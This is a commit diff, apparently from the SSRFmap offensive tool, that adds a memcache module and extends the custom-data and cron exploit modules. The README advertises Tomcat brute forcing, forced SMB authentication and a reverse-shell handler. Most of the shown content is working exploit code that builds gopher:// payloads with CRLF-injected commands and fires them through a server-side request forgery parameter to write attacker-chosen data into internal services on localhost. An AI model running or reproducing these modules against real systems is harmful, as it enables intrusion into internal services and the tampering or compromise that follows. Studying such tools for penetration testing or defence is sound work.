MODULE - Memcache store data
parent
d57cbcce98
commit
da86cab442
18
README.md
18
README.md
|
@ -39,6 +39,7 @@ The following modules are already implemented and can be used with the `-m` argu
|
|||
| `smbhash` | Force an SMB authentication via a UNC Path |
|
||||
| `tomcat` | Bruteforce attack against Tomcat Manager |
|
||||
| `custom` | Send custom data to a listening service, e.g: netcat |
|
||||
| `memcache` | Store data inside the memcache instance |
|
||||
|
||||
|
||||
## Install and Manual
|
||||
|
@ -46,21 +47,22 @@ The following modules are already implemented and can be used with the `-m` argu
|
|||
Basic install from the Github repository.
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/swisskyrepo/SSRFmap
|
||||
cd SSRFmap/
|
||||
pip3 install -r requirements.txt
|
||||
python3 ssrfmap.py
|
||||
$ git clone https://github.com/swisskyrepo/SSRFmap
|
||||
$ cd SSRFmap/
|
||||
$ pip3 install -r requirements.txt
|
||||
$ python3 ssrfmap.py
|
||||
|
||||
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
|
||||
[--lhost LHOST] [--lport LPORT] [--uagent USERAGENT]
|
||||
[--ssl [SSL]] [--level [LEVEL]]
|
||||
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
|
||||
[-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
|
||||
[--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
|
||||
|
||||
optional arguments:
|
||||
optional arguments:
|
||||
-h, --help show this help message and exit
|
||||
-r REQFILE SSRF Request file
|
||||
-p PARAM SSRF Parameter to target
|
||||
-m MODULES SSRF Modules to enable
|
||||
-l HANDLER Start an handler for a reverse shell
|
||||
-v [VERBOSE] Enable verbosity
|
||||
--lhost LHOST LHOST reverse shell
|
||||
--lport LPORT LPORT reverse shell
|
||||
--uagent USERAGENT User Agent to use
|
||||
|
|
|
@ -14,10 +14,17 @@ class exploit():
|
|||
|
||||
def __init__(self, requester, args):
|
||||
logging.info("Module '{}' launched !".format(name))
|
||||
gen_host = gen_ip_list("127.0.0.1", args.level)
|
||||
SERVICE_PORT = input("Service Port: ")
|
||||
SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
|
||||
gen_hosts = gen_ip_list("127.0.0.1", args.level)
|
||||
self.SERVICE_PORT = input("Service Port: ")
|
||||
self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
|
||||
|
||||
for gen_host in gen_hosts:
|
||||
payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)
|
||||
|
||||
if args.verbose == True:
|
||||
logging.info("Generated payload : {}".format(payload))
|
||||
|
||||
for SERVICE_IP in gen_host:
|
||||
payload = wrapper_gopher(SERVICE_DATA, SERVICE_IP, SERVICE_PORT)
|
||||
r = requester.do_request(args.param, payload)
|
||||
|
||||
if args.verbose == True:
|
||||
logging.info("Module '{}' ended !".format(name))
|
|
@ -0,0 +1,34 @@
|
|||
from core.utils import *
|
||||
import urllib.parse
|
||||
import logging
|
||||
|
||||
name = "memcache"
|
||||
description = "Store data inside the memcache instance"
|
||||
author = "Swissky"
|
||||
documentation = []
|
||||
|
||||
class exploit():
|
||||
SERVICE_IP = "127.0.0.1"
|
||||
SERVICE_PORT = "11211"
|
||||
SERVICE_DATA = "\r\n"
|
||||
|
||||
def __init__(self, requester, args):
|
||||
logging.info("Module '{}' launched !".format(name))
|
||||
gen_host = gen_ip_list("127.0.0.1", args.level)
|
||||
payload = input("Data to store: ")
|
||||
|
||||
self.SERVICE_DATA += 'set payloadname 0 0 {}\r\n'.format(len(payload))
|
||||
self.SERVICE_DATA += '{}\r\n'.format(payload)
|
||||
self.SERVICE_DATA += 'quit\r\n'
|
||||
self.SERVICE_DATA = urllib.parse.quote(self.SERVICE_DATA)
|
||||
|
||||
for SERVICE_IP in gen_host:
|
||||
payload = wrapper_gopher(self.SERVICE_DATA, self.SERVICE_IP, self.SERVICE_PORT)
|
||||
|
||||
if args.verbose == True:
|
||||
logging.info("Generated payload : {}".format(payload))
|
||||
|
||||
r = requester.do_request(args.param, payload)
|
||||
|
||||
if args.verbose == True:
|
||||
logging.info("Module '{}' ended !".format(name))
|
|
@ -45,9 +45,15 @@ class exploit():
|
|||
payload = payload.replace("SERVER_CRON", self.SERVER_CRON)
|
||||
payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD))
|
||||
|
||||
if args.verbose == True:
|
||||
logging.info("Generated payload : {}".format(payload))
|
||||
|
||||
# Send the payload
|
||||
r = requester.do_request(args.param, payload)
|
||||
|
||||
if args.verbose == True:
|
||||
logging.info("Module '{}' ended !".format(name))
|
||||
|
||||
"""
|
||||
TODO:
|
||||
This exploit only works if you have control over a cron file.
|
||||
|
|
|
@ -29,6 +29,7 @@ def parse_args():
|
|||
parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target")
|
||||
parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
|
||||
parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell")
|
||||
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
|
||||
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
|
||||
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
|
||||
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
|
||||
|
|
Loading…
Reference in New Issue